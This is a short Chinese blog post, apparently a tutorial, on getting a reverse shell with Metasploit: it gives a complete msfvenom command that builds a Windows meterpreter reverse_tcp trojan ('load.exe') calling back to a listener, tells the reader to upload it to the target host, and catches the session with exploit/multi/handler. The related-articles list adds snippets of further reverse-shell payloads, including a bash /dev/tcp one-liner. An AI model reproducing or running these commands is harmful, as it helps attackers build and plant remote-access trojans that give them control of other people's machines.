美文网首页
Metasploit 反弹shell

Metasploit 反弹shell

作者: 帣小王 | 来源:发表于2018-12-24 17:22 被阅读0次

首先,使用msfvenom制作一个普通木马。

命令

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.224 lport=4444 -f exe > load.exe

然后将制作出来的msf马传到目标主机上

在msf使用exploit/multi/handler模块,配置如图:

在msf里会接收到反弹的session会话

shell反弹完成!

相关文章

  • 网络安全-Day40-Cobalt Strike使用(二)

    结合metasploit,反弹shell 1、启动CS服务端(./teamserver 192.168.31.23...

  • Metasploit 反弹shell

    首先,使用msfvenom制作一个普通木马。 命令 msfvenom -p windows/meterpreter...

  • APT实例

    结合metasploit,反弹shell 1、 启动服务端:(test 为待会靶机连接服务器的密码) (./te...

  • 【安全记录】反弹shell小记

    前言 本文记录反弹shell的一些注意事项,主要包括:常用反弹shell的payload,获得tty-shell,...

  • nc自启动

    例如开机自启cmd 自启nc反弹shell(一) 自启nc反弹shell(二)

  • kail工具介绍

    反弹Shell https://www.cnblogs.com/cocowool/p/reverse-shell....

  • 反弹shell

    Reverse Shell bash反弹服务端: bash -c 'sh -i &>/dev/tcp/210.28...

  • 反弹shell

    bash -i 操作 攻击机 192.168.188.140执行 nc -lvvp 8888监听本地8888端口 ...

  • Shell反弹

    背景 前段时间因为使用Flink默认配置,没有禁用通过web上传jar包提交作业的功能,同时服务器配有公网地址,也...

  • 反弹shell

    0X01 什么是反弹shell reverse shell,就是控制端监听在某TCP/UDP端口,被控端发起请求到...

网友评论

      本文标题:Metasploit 反弹shell

      本文链接:https://www.haomeiwen.com/subject/cdlaiftx.html